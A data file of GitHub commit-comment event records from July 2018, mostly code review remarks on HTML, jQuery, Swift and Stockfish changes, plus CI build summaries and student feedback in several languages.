{"id":"8026165415","type":"CommitCommentEvent","actor":{"login":"bonchii"},"repo":{"name":"shiorimasu/pra"},"payload":{"comment":{"id":29852823,"position":4,"line":11,"path":"index.html","commit_id":"09fcd572ca4824978c2e3fef03ab91f5478405ad","created_at":"2018-07-27T02:15:59Z","updated_at":"2018-07-27T02:15:59Z","author_association":"NONE","body":"viewport設定被ってるかも？"}},"created_at":"2018-07-27T02:15:59Z"}
{"id":"8026168245","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"Jekaa/Stockfish"},"payload":{"comment":{"id":29852834,"position":null,"line":null,"path":null,"commit_id":"f76c6f42a3c0b9be345859545bd37bf5df9be20d","created_at":"2018-07-27T02:17:08Z","updated_at":"2018-07-27T02:17:08Z","author_association":"NONE","body":"Personally, I say merge as is.\r\nIf others want an LTC, please use [0,4]. This is the usual for speed gains tested on the framework."}},"created_at":"2018-07-27T02:17:08Z"}
{"id":"8026168482","type":"CommitCommentEvent","actor":{"login":"bonchii"},"repo":{"name":"shiorimasu/pra"},"payload":{"comment":{"id":29852836,"position":22,"line":20,"path":"index.html","commit_id":"09fcd572ca4824978c2e3fef03ab91f5478405ad","created_at":"2018-07-27T02:17:13Z","updated_at":"2018-07-27T02:17:13Z","author_association":"NONE","body":"ここのinnerクラスは残したほうが良いかも。imgタグと並列でブロック要素（divとか）は置かないほうが安全。崩れたりしないように。"}},"created_at":"2018-07-27T02:17:13Z"}
{"id":"8026168819","type":"CommitCommentEvent","actor":{"login":"kevinbarabash"},"repo":{"name":"Khan/KaTeX"},"payload":{"comment":{"id":29852838,"position":null,"line":null,"path":null,"commit_id":"7ab4f76e16e3d3950062ffd6efa4a4b50f7fa5fe","created_at":"2018-07-27T02:17:20Z","updated_at":"2018-07-27T02:17:20Z","author_association":"MEMBER","body":"Khan Academy is using version 0.9.0 of KaTeX.  I'm not sure when we'll get around to updating this again, maybe sometime in the fall."}},"created_at":"2018-07-27T02:17:20Z"}
{"id":"8026170733","type":"CommitCommentEvent","actor":{"login":"kevnoutsawo"},"repo":{"name":"SauravBansal448/code-days-JS-code100"},"payload":{"comment":{"id":29852845,"position":null,"line":null,"path":null,"commit_id":"e0093dbc523d7b49757de0e5df2b92575c865ed0","created_at":"2018-07-27T02:18:06Z","updated_at":"2018-07-27T02:18:06Z","author_association":"NONE","body":"Hello, \r\nI think you should upload it on codepen or use github pages to allow live preview of your work.\r\nKind regards"}},"created_at":"2018-07-27T02:18:06Z"}
{"id":"8026173108","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"Jekaa/Stockfish"},"payload":{"comment":{"id":29852853,"position":null,"line":null,"path":null,"commit_id":"f76c6f42a3c0b9be345859545bd37bf5df9be20d","created_at":"2018-07-27T02:19:03Z","updated_at":"2018-07-27T02:19:03Z","author_association":"NONE","body":"For speedups you don't need LTC (usually)"}},"created_at":"2018-07-27T02:19:03Z"}
{"id":"8026173960","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29852858,"position":1,"line":null,"path":"1532657962.11/github_test.txt","commit_id":"be59531ed85b222fe446450bec0beba7acd0066f","created_at":"2018-07-27T02:19:23Z","updated_at":"2018-07-27T02:19:23Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-27T02:19:23Z"}
{"id":"8026174861","type":"CommitCommentEvent","actor":{"login":"bonchii"},"repo":{"name":"shiorimasu/pra"},"payload":{"comment":{"id":29852864,"position":32,"line":28,"path":"index.html","commit_id":"09fcd572ca4824978c2e3fef03ab91f5478405ad","created_at":"2018-07-27T02:19:45Z","updated_at":"2018-07-27T02:19:45Z","author_association":"NONE","body":"バナーみたいに画像サイズ変わる可能性が高い画像は、width=980 height=70みたいにサイズ指定して、強制的に閉じ込めたほうが安全。あともう一つ、上でコメントしたinnerにwidth, height指定し、inner > img のところでwidth=100% height=100%で指定しておけばさらに安全。\r\ninnerというクラス名だと役割わかりにくいから、top-banner-image-wrapみたいにするといいかも。"}},"created_at":"2018-07-27T02:19:45Z"}
{"id":"8026178327","type":"CommitCommentEvent","actor":{"login":"brentadamson"},"repo":{"name":"jivesearch/jivesearch"},"payload":{"comment":{"id":29852875,"position":null,"line":null,"path":null,"commit_id":"f30dd80a987589f96246c2f6aff451acde7ecd1b","created_at":"2018-07-27T02:21:03Z","updated_at":"2018-07-27T02:21:03Z","author_association":"MEMBER","body":"#47 "}},"created_at":"2018-07-27T02:21:03Z"}
{"id":"8026178874","type":"CommitCommentEvent","actor":{"login":"brentadamson"},"repo":{"name":"jivesearch/jivesearch"},"payload":{"comment":{"id":29852878,"position":null,"line":null,"path":null,"commit_id":"41cb7b3b017593d1676b22decb584994a6091669","created_at":"2018-07-27T02:21:16Z","updated_at":"2018-07-27T02:21:16Z","author_association":"MEMBER","body":"#47 "}},"created_at":"2018-07-27T02:21:16Z"}
{"id":"8026179229","type":"CommitCommentEvent","actor":{"login":"bonchii"},"repo":{"name":"shiorimasu/pra"},"payload":{"comment":{"id":29852881,"position":34,"line":30,"path":"index.html","commit_id":"09fcd572ca4824978c2e3fef03ab91f5478405ad","created_at":"2018-07-27T02:21:24Z","updated_at":"2018-07-27T02:21:24Z","author_association":"NONE","body":"sectionの最初の子供はhタグが望ましいらしい。\r\nhttps://developer.mozilla.org/ja/docs/Web/HTML/Sections_and_Outlines_of_an_HTML5_document"}},"created_at":"2018-07-27T02:21:24Z"}
{"id":"8026180145","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"ShardeDeLane/UI-II-Flexbox"},"payload":{"comment":{"id":29852885,"position":null,"line":null,"path":null,"commit_id":"1dd1caef235de39730e57e145306da5889673834","created_at":"2018-07-27T02:21:45Z","updated_at":"2018-07-27T02:21:45Z","author_association":"NONE","body":"Hey Sharde, I like the work but I'm not seeing much work on the services page. Did you get to complete it? Were you having trouble saving your work through git?"}},"created_at":"2018-07-27T02:21:45Z"}
{"id":"8026203340","type":"CommitCommentEvent","actor":{"login":"bonchii"},"repo":{"name":"shiorimasu/pra"},"payload":{"comment":{"id":29852940,"position":181,"line":121,"path":"index.html","commit_id":"09fcd572ca4824978c2e3fef03ab91f5478405ad","created_at":"2018-07-27T02:30:39Z","updated_at":"2018-07-27T02:30:39Z","author_association":"NONE","body":"ul liの構成がdivの羅列になっちゃっている。役割的にはliっぽいから、liで構成もできるようになっていると◎"}},"created_at":"2018-07-27T02:30:39Z"}
{"id":"8026207379","type":"CommitCommentEvent","actor":{"login":"jorgegonzalez"},"repo":{"name":"jorgegonzalez/zoe"},"payload":{"comment":{"id":29852947,"position":21,"line":30,"path":"src/cli.ts","commit_id":"66515b6bafa892defb9fd7910535a9c860a7005a","created_at":"2018-07-27T02:32:09Z","updated_at":"2018-07-27T02:32:09Z","author_association":"OWNER","body":"Can you explain this change?"}},"created_at":"2018-07-27T02:32:09Z"}
{"id":"8026210425","type":"CommitCommentEvent","actor":{"login":"danielhollas"},"repo":{"name":"Khan/KaTeX"},"payload":{"comment":{"id":29852958,"position":null,"line":null,"path":null,"commit_id":"7ab4f76e16e3d3950062ffd6efa4a4b50f7fa5fe","created_at":"2018-07-27T02:33:19Z","updated_at":"2018-07-27T02:33:19Z","author_association":"NONE","body":"Thanks! FYI: I've created a tracking JIRA ticket [IC-194](https://khanacademy.atlassian.net/browse/IC-193)."}},"created_at":"2018-07-27T02:33:19Z"}
{"id":"8026211920","type":"CommitCommentEvent","actor":{"login":"NhuLe93"},"repo":{"name":"EvolableAsiaDevelopment/Developer-Day-Landing-Page"},"payload":{"comment":{"id":29852964,"position":25,"line":22,"path":"source/scss/blocks/banner.scss","commit_id":"d31c96aab3167e628785015a6e9930107a92ef07","created_at":"2018-07-27T02:33:55Z","updated_at":"2018-07-27T02:33:55Z","author_association":"NONE","body":"That is background size contain.\r\nKhông có nhầm nha chị"}},"created_at":"2018-07-27T02:33:55Z"}
{"id":"8026212523","type":"CommitCommentEvent","actor":{"login":"bonchii"},"repo":{"name":"shiorimasu/pra"},"payload":{"comment":{"id":29852968,"position":717,"line":480,"path":"index.html","commit_id":"09fcd572ca4824978c2e3fef03ab91f5478405ad","created_at":"2018-07-27T02:34:10Z","updated_at":"2018-07-27T02:34:10Z","author_association":"NONE","body":"html5だとこういう要素もあり\r\nhttp://www.htmq.com/html5/small.shtml"}},"created_at":"2018-07-27T02:34:10Z"}
{"id":"8026215507","type":"CommitCommentEvent","actor":{"login":"hangttt2"},"repo":{"name":"EvolableAsiaDevelopment/Developer-Day-Landing-Page"},"payload":{"comment":{"id":29852975,"position":5,"line":8,"path":"source/jade/blocks/organizer-block.jade","commit_id":"d31c96aab3167e628785015a6e9930107a92ef07","created_at":"2018-07-27T02:35:18Z","updated_at":"2018-07-27T02:35:18Z","author_association":"CONTRIBUTOR","body":"logo-skydisc.png? Right?"}},"created_at":"2018-07-27T02:35:18Z"}
{"id":"8026216265","type":"CommitCommentEvent","actor":{"login":"bonchii"},"repo":{"name":"shiorimasu/pra"},"payload":{"comment":{"id":29852976,"position":48,"line":55,"path":"index.js","commit_id":"09fcd572ca4824978c2e3fef03ab91f5478405ad","created_at":"2018-07-27T02:35:35Z","updated_at":"2018-07-27T02:35:35Z","author_association":"NONE","body":"色々な書き方はできるけど、できるだけ他の書き方と統一したほうがよさげ。見やすさ、わかりやすさの観点で。"}},"created_at":"2018-07-27T02:35:35Z"}
{"id":"8026217306","type":"CommitCommentEvent","actor":{"login":"happiness9721"},"repo":{"name":"HeroTransitions/Hero"},"payload":{"comment":{"id":29852979,"position":null,"line":null,"path":null,"commit_id":"f4dab9ed2ab88ae065605199d5aca7706b07c2ad","created_at":"2018-07-27T02:36:01Z","updated_at":"2018-07-27T02:36:01Z","author_association":"NONE","body":"how about merge line 43 and 45, the full function will be looks like:\r\n\r\n```swift\r\n@objc dynamic func hero_add(anim: CAAnimation, forKey: String?) {\r\n  if CALayer.heroAddedAnimations != nil {\r\n    let copiedAnim = anim.copy() as! CAAnimation\r\n    copiedAnim.delegate = nil // having delegate resulted some weird animation behavior\r\n    CALayer.heroAddedAnimations!.append((self, forKey!, copiedAnim))\r\n  }\r\n  hero_add(anim: anim, forKey: forKey)\r\n}\r\n```"}},"created_at":"2018-07-27T02:36:01Z"}
{"id":"8026218455","type":"CommitCommentEvent","actor":{"login":"Gcaufy"},"repo":{"name":"iMyth/wepy"},"payload":{"comment":{"id":29852985,"position":76,"line":76,"path":"packages/wepy-web/src/components/image.vue","commit_id":"9e32ded6c80fda4ad8fc3898d60a7341cad3da6e","created_at":"2018-07-27T02:36:26Z","updated_at":"2018-07-27T02:36:26Z","author_association":"NONE","body":"这里加个throw  not supported."}},"created_at":"2018-07-27T02:36:26Z"}
{"id":"8026220699","type":"CommitCommentEvent","actor":{"login":"lyon-fan"},"repo":{"name":"lyon-fan/FA1"},"payload":{"comment":{"id":29852992,"position":null,"line":null,"path":null,"commit_id":"0d6cfef3176c570315f56d6cbe854794da144059","created_at":"2018-07-27T02:37:17Z","updated_at":"2018-07-27T02:37:17Z","author_association":"OWNER","body":"20180727"}},"created_at":"2018-07-27T02:37:17Z"}
{"id":"8026221369","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"Jekaa/Stockfish"},"payload":{"comment":{"id":29852994,"position":null,"line":null,"path":null,"commit_id":"f76c6f42a3c0b9be345859545bd37bf5df9be20d","created_at":"2018-07-27T02:37:34Z","updated_at":"2018-07-27T02:37:34Z","author_association":"NONE","body":"Congrats!  My understanding is also that LTC is not needed."}},"created_at":"2018-07-27T02:37:34Z"}
{"id":"8026222403","type":"CommitCommentEvent","actor":{"login":"Gcaufy"},"repo":{"name":"iMyth/wepy"},"payload":{"comment":{"id":29852996,"position":32,"line":32,"path":"packages/wepy-web/src/components/image.vue","commit_id":"9e32ded6c80fda4ad8fc3898d60a7341cad3da6e","created_at":"2018-07-27T02:37:52Z","updated_at":"2018-07-27T02:37:52Z","author_association":"NONE","body":"aspectFill 应该还要加个x, y center的属性吧，我在小程序中看只显示中间部分。\r\n其它几中模式也建议一一对比一下看看。"}},"created_at":"2018-07-27T02:37:52Z"}
{"id":"8026223104","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29852997,"position":null,"line":null,"path":null,"commit_id":"59ea6ca48c7ba5202ee14daa752709e02e5edbe1","created_at":"2018-07-27T02:38:09Z","updated_at":"2018-07-27T02:38:09Z","author_association":"NONE","body":"159313706_Issue#6796 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1694 of 1698 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 649\n * Failed: 4\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-59ea6ca48c7ba5202ee14daa752709e02e5edbe1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-59ea6ca48c7ba5202ee14daa752709e02e5edbe1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.76%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-59ea6ca48c7ba5202ee14daa752709e02e5edbe1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-27T02:38:09Z"}
{"id":"8026224438","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29853002,"position":null,"line":null,"path":null,"commit_id":"875c2078a9ef8412bbebf1a953e20921460ba5b0","created_at":"2018-07-27T02:38:38Z","updated_at":"2018-07-27T02:38:38Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [tinefinpat](https://tinefinpat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/create-custom-upstream](https://tinefinpat-static-docs.pantheonsite.io/docs/create-custom-upstream)\n"}},"created_at":"2018-07-27T02:38:38Z"}
{"id":"8026225193","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29853004,"position":null,"line":null,"path":null,"commit_id":"10c44b91e3154ee2a2c106b2388f4e2742bec104","created_at":"2018-07-27T02:38:56Z","updated_at":"2018-07-27T02:38:56Z","author_association":"NONE","body":"I believe @locutus2 is correct.  This would have to pass [0,4] to be considered."}},"created_at":"2018-07-27T02:38:56Z"}
{"id":"8026225391","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"juliejonak/UI-II-Flexbox"},"payload":{"comment":{"id":29853007,"position":null,"line":null,"path":null,"commit_id":"45b8065d430e0bd7c7b18e93758c14d4e52053e1","created_at":"2018-07-27T02:39:00Z","updated_at":"2018-07-27T02:39:00Z","author_association":"NONE","body":"Hey Julie! I like the work you did on your page, it looks great. One thing I would look into is making the nav bar fade on scroll, but that's just a little stretch. I also recommend making commits more often so that I, and future employers can have a better look at your workflow. "}},"created_at":"2018-07-27T02:39:00Z"}
{"id":"8026225595","type":"CommitCommentEvent","actor":{"login":"azdanov"},"repo":{"name":"jorgegonzalez/zoe"},"payload":{"comment":{"id":29853008,"position":21,"line":30,"path":"src/cli.ts","commit_id":"66515b6bafa892defb9fd7910535a9c860a7005a","created_at":"2018-07-27T02:39:05Z","updated_at":"2018-07-27T02:39:05Z","author_association":"COLLABORATOR","body":"1. `/* eslint-disable import/first */` is not needed since npm imports are first.\r\n\r\n2. `export default async function main()` is needed for tests.\r\n\r\n3. `// eslint-disable-next-line unicorn/no-process-exit` doesn't like `process.exit(0);` because it terminates the program instantly. It can be bad if there needs to be some cleanup or whatever. I just set the `exitCode` and return from `main()` which is equivalent in this situation. I wanted remove the eslint-ignore comment."}},"created_at":"2018-07-27T02:39:05Z"}
{"id":"8026225648","type":"CommitCommentEvent","actor":{"login":"bonchii"},"repo":{"name":"shiorimasu/pra"},"payload":{"comment":{"id":29853009,"position":66,"line":73,"path":"index.js","commit_id":"09fcd572ca4824978c2e3fef03ab91f5478405ad","created_at":"2018-07-27T02:39:06Z","updated_at":"2018-07-27T02:39:06Z","author_association":"NONE","body":"jquery呼び出しが毎度入ってしまうと、負荷が高くなってしまう。\r\nこういう場合は直上のように、使用する要素を全部変数に保管しておくと負荷が減る。"}},"created_at":"2018-07-27T02:39:06Z"}
{"id":"8026225707","type":"CommitCommentEvent","actor":{"login":"MRTHAKER"},"repo":{"name":"MRTHAKER/android_device_zuk_z2_plus"},"payload":{"comment":{"id":29853010,"position":null,"line":null,"path":null,"commit_id":"aa4408da5d0c3cec3405700f21fb2a0f6724d195","created_at":"2018-07-27T02:39:08Z","updated_at":"2018-07-27T02:39:08Z","author_association":"OWNER","body":"https://drive.google.com/open?id=1df4zL27AuCYklwwm2ekjUH43hyqvFRfZ"}},"created_at":"2018-07-27T02:39:08Z"}
{"id":"8026226470","type":"CommitCommentEvent","actor":{"login":"NhuLe93"},"repo":{"name":"EvolableAsiaDevelopment/Developer-Day-Landing-Page"},"payload":{"comment":{"id":29853011,"position":5,"line":8,"path":"source/jade/blocks/organizer-block.jade","commit_id":"d31c96aab3167e628785015a6e9930107a92ef07","created_at":"2018-07-27T02:39:24Z","updated_at":"2018-07-27T02:39:24Z","author_association":"NONE","body":"logo-skydisc.png is wrong\r\nThe logo-skydisc.jpg is right"}},"created_at":"2018-07-27T02:39:24Z"}
{"id":"8026236801","type":"CommitCommentEvent","actor":{"login":"kageiit"},"repo":{"name":"facebook/buck"},"payload":{"comment":{"id":29853022,"position":null,"line":null,"path":null,"commit_id":"45f55ae6b0020f729e42f98db95396c8facf54ed","created_at":"2018-07-27T02:43:03Z","updated_at":"2018-07-27T02:43:03Z","author_association":"CONTRIBUTOR","body":"@sbalabanov can we move the dir artifact cache cleanup to this framework as well?"}},"created_at":"2018-07-27T02:43:03Z"}
{"id":"8026239083","type":"CommitCommentEvent","actor":{"login":"ezrayst"},"repo":{"name":"ezrayst/mpm"},"payload":{"comment":{"id":29853025,"position":4,"line":73,"path":"include/material/material.h","commit_id":"b76aa74183a2b1b127bc14994b0176ad37e19a68","created_at":"2018-07-27T02:43:58Z","updated_at":"2018-07-27T02:43:58Z","author_association":"OWNER","body":"Not sure how to overload this with the other parameters such as this one\r\n\r\nIn addition, shouldn't we use `dstrain` instead of `strain`?"}},"created_at":"2018-07-27T02:43:58Z"}
{"id":"8026239651","type":"CommitCommentEvent","actor":{"login":"hhdang6637"},"repo":{"name":"hhdang6637/embedded_linux_skeleton"},"payload":{"comment":{"id":29853027,"position":null,"line":null,"path":null,"commit_id":"043dcf1540997519bd1ddf4e528d94348383af2c","created_at":"2018-07-27T02:44:10Z","updated_at":"2018-07-27T02:44:10Z","author_association":"OWNER","body":"@quoctri1 , please review my changes"}},"created_at":"2018-07-27T02:44:10Z"}
{"id":"8026239658","type":"CommitCommentEvent","actor":{"login":"bonchii"},"repo":{"name":"shiorimasu/pra"},"payload":{"comment":{"id":29853028,"position":null,"line":null,"path":null,"commit_id":"b8c8a4af2b94871376272a949c0b781db7c8c8c1","created_at":"2018-07-27T02:44:10Z","updated_at":"2018-07-27T02:44:10Z","author_association":"NONE","body":"コミットの内容は、自分のためにも、誰かにためにも、できるだけ具体的に書いておくといいよ。\r\n・インデントの修正\r\n・jsの不要な記述を削除\r\nみたいな感じで。これでも抽象的だから、もっとわかりやすくしてOK！"}},"created_at":"2018-07-27T02:44:10Z"}
{"id":"8026244911","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"kyleteeter/UI-II-Flexbox"},"payload":{"comment":{"id":29853037,"position":null,"line":null,"path":null,"commit_id":"1fbe6873a08523b981fbcf7efe99ae5c80f8a55f","created_at":"2018-07-27T02:46:09Z","updated_at":"2018-07-27T02:46:09Z","author_association":"NONE","body":"Hey Kyle, I like your work. I would recommend commits more often, like every time you get a portion of the work done, save your work. This will help you have something to fall back on in case your code ever gets messed up, it also helps anyone reviewing your code follow your workflow."}},"created_at":"2018-07-27T02:46:09Z"}
{"id":"8026245277","type":"CommitCommentEvent","actor":{"login":"safarinarges"},"repo":{"name":"safarinarges/MoviereviewsNLTK"},"payload":{"comment":{"id":29853039,"position":null,"line":null,"path":null,"commit_id":"2a886fe6edf1d1cec7df05392a6fdb5cb3f10d78","created_at":"2018-07-27T02:46:18Z","updated_at":"2018-07-27T02:46:18Z","author_association":"OWNER","body":"The irrelevant codes are prerequisite for the final version of movie reviews' mining."}},"created_at":"2018-07-27T02:46:18Z"}
{"id":"8026247662","type":"CommitCommentEvent","actor":{"login":"My-Jie"},"repo":{"name":"My-Jie/data_import"},"payload":{"comment":{"id":29853041,"position":1,"line":1,"path":"Business/__init__.py","commit_id":"ea8197d1651efc1bf38bfa3f83ae923fa0bb6cb0","created_at":"2018-07-27T02:47:13Z","updated_at":"2018-07-27T02:47:13Z","author_association":"OWNER","body":"tesst1"}},"created_at":"2018-07-27T02:47:13Z"}
{"id":"8026249545","type":"CommitCommentEvent","actor":{"login":"nataliawinter"},"repo":{"name":"maiconmoretto/design-patterns"},"payload":{"comment":{"id":29853042,"position":5,"line":5,"path":"index.php","commit_id":"38f08a2316e35eb1f9f8815864dc2e04b8d06585","created_at":"2018-07-27T02:47:55Z","updated_at":"2018-07-27T02:47:55Z","author_association":"NONE","body":"tem uma reforma no meio do teu 2018 uaheiuaheue"}},"created_at":"2018-07-27T02:47:55Z"}
{"id":"8026249793","type":"CommitCommentEvent","actor":{"login":"domDavid555"},"repo":{"name":"desktop/desktop"},"payload":{"comment":{"id":29853043,"position":null,"line":null,"path":null,"commit_id":"48e75269919bf826b0210ad8e56e6e269cacc160","created_at":"2018-07-27T02:48:02Z","updated_at":"2018-07-27T02:48:02Z","author_association":"NONE","body":"im sorry i dont really know what im doing"}},"created_at":"2018-07-27T02:48:02Z"}
{"id":"8026249911","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"ripple/rippled"},"payload":{"comment":{"id":29853044,"position":null,"line":null,"path":null,"commit_id":"09050a860be745c88a54fbcbce1e317c72f2f51e","created_at":"2018-07-27T02:48:05Z","updated_at":"2018-07-27T02:48:05Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/ripple/rippled/commit/09050a860be745c88a54fbcbce1e317c72f2f51e)\n\nBuilt at __20180727 - 02:48:04__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.Debug | [logfile](http://ci.ops.ripple.com/job/rippled-dev/job/develop/23//artifact/msvc.Debug.txt) | 1031 cases, 0 failed, t: 539s | PASS :white_check_mark: \ngcc.Debug <br/>-Dcoverage=ON | [logfile](http://ci.ops.ripple.com/job/rippled-dev/job/develop/23//artifact/gcc.Debug_Dcoverage_ON.txt) | 1034 cases, 0 failed, t: 847s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/rippled-dev/job/develop/23//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/rippled-dev/job/develop/23//artifact/gcc.Release_Dassert_ON_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 923s | PASS :white_check_mark: \nclang.Debug | [logfile](http://ci.ops.ripple.com/job/rippled-dev/job/develop/23//artifact/clang.Debug.txt) | 1034 cases, 0 failed, t: 279s | PASS :white_check_mark: \nmsvc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/rippled-dev/job/develop/23//artifact/msvc.Debug_NINJA_BUILD_true.txt) | 1031 cases, 0 failed, t: 556s | PASS :white_check_mark: \ngcc.Debug | [logfile](http://ci.ops.ripple.com/job/rippled-dev/job/develop/23//artifact/gcc.Debug.txt) | 1034 cases, 0 failed, t: 290s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/rippled-dev/job/develop/23//artifact/clang.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 720s | PASS :white_check_mark: \nrpm | [logfile](http://ci.ops.ripple.com/job/rippled-dev/job/develop/23//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \nclang.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/rippled-dev/job/develop/23//artifact/clang.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 397s | PASS :white_check_mark: \ngcc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/rippled-dev/job/develop/23//artifact/gcc.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 770s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/rippled-dev/job/develop/23//artifact/gcc.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 420s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF | [logfile](http://ci.ops.ripple.com/job/rippled-dev/job/develop/23//artifact/gcc.Debug_Dstatic_OFF.txt) | 1034 cases, 0 failed, t: 289s | PASS :white_check_mark: \nmsvc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/rippled-dev/job/develop/23//artifact/msvc.Debug_Dunity_OFF.txt) | 1027 cases, 0 failed, t: 1161s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF -DBUILD_SHARED_LIBS=ON | [logfile](http://ci.ops.ripple.com/job/rippled-dev/job/develop/23//artifact/gcc.Debug_Dstatic_OFF_DBUILD_SHARED_LIBS_ON.txt) | 1034 cases, 0 failed, t: 290s | PASS :white_check_mark: \ngcc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/rippled-dev/job/develop/23//artifact/gcc.Debug_NINJA_BUILD_true.txt) | 1034 cases, 0 failed, t: 262s | PASS :white_check_mark: \nmsvc.Release | [logfile](http://ci.ops.ripple.com/job/rippled-dev/job/develop/23//artifact/msvc.Release.txt) | 1031 cases, 0 failed, t: 392s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=address, <br/>PARALLEL_TESTS=false, <br/>DEBUGGER=false | [logfile](http://ci.ops.ripple.com/job/rippled-dev/job/develop/23//artifact/clang.Debug_Dunity_OFF_Dsan_address_PARALLEL_TESTS_false_DEBUGGER_false.txt) | 1030 cases, 0 failed, t: 559s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=undefined, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/rippled-dev/job/develop/23//artifact/clang.Debug_Dunity_OFF_Dsan_undefined_PARALLEL_TESTS_false.txt) | 1030 cases, 0 failed, t: 1037s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-27T02:48:05Z"}
{"id":"8026250622","type":"CommitCommentEvent","actor":{"login":"nataliawinter"},"repo":{"name":"maiconmoretto/design-patterns"},"payload":{"comment":{"id":29853046,"position":5,"line":5,"path":"index.php","commit_id":"38f08a2316e35eb1f9f8815864dc2e04b8d06585","created_at":"2018-07-27T02:48:21Z","updated_at":"2018-07-27T02:48:21Z","author_association":"NONE","body":"pareci uma cartomante agora"}},"created_at":"2018-07-27T02:48:21Z"}
{"id":"8026251230","type":"CommitCommentEvent","actor":{"login":"bonchii"},"repo":{"name":"shiorimasu/pra"},"payload":{"comment":{"id":29853049,"position":43,"line":419,"path":"index.html","commit_id":"c4d39c5598545cef3782b6175510b7f306e7327a","created_at":"2018-07-27T02:48:35Z","updated_at":"2018-07-27T02:48:35Z","author_association":"NONE","body":"$(function(){\r\n  $.ajax({\r\n    ...\r\nで始めたほうがいいですね！ブラウザには、リクエスト、外部呼出し、レンダリング、みたいに作業順があって、回線とかの影響で容易にその順番が崩れる。あとは非同期処理とかの関係もあったり。なので、そういう実行タイミング、呼び出しタイミングは明示的に指定してあげないと、バグになりやすいので。"}},"created_at":"2018-07-27T02:48:35Z"}
{"id":"8026252312","type":"CommitCommentEvent","actor":{"login":"quoctri1"},"repo":{"name":"hhdang6637/embedded_linux_skeleton"},"payload":{"comment":{"id":29853051,"position":null,"line":null,"path":null,"commit_id":"043dcf1540997519bd1ddf4e528d94348383af2c","created_at":"2018-07-27T02:49:01Z","updated_at":"2018-07-27T02:49:01Z","author_association":"COLLABORATOR","body":"@hhdang6637  Yea, it really doesn't need to add ram_stat.cpp and ram_stat.h"}},"created_at":"2018-07-27T02:49:01Z"}
{"id":"8026256187","type":"CommitCommentEvent","actor":{"login":"bonchii"},"repo":{"name":"shiorimasu/pra"},"payload":{"comment":{"id":29853058,"position":43,"line":419,"path":"index.html","commit_id":"c4d39c5598545cef3782b6175510b7f306e7327a","created_at":"2018-07-27T02:50:26Z","updated_at":"2018-07-27T02:50:26Z","author_association":"NONE","body":"あと、外部APIを呼び出すような機能の場合だと特に、外部jsで呼び出してあげたほうが機密性が良くなりますー"}},"created_at":"2018-07-27T02:50:26Z"}
